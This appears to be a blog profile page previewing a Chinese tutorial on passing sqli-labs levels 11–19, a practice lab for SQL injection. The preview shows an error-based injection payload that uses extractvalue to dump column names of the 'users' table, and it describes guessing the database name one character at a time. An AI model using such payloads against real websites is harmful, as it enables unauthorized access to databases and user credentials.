- 博客(1)
- 收藏
- 关注
RSS订阅原创 sqli-labs靶场十一关到十九关通关教程
爆字段:1','1',extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),0x7e)))#我们要重复此操作八次,才能猜出数据库名,方法和上面一样,就是把substr(database(),2,1)一直递增到8,最后得到数据库名为security。这里只演示了一个列名。
2025-06-26 20:25:39
717
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人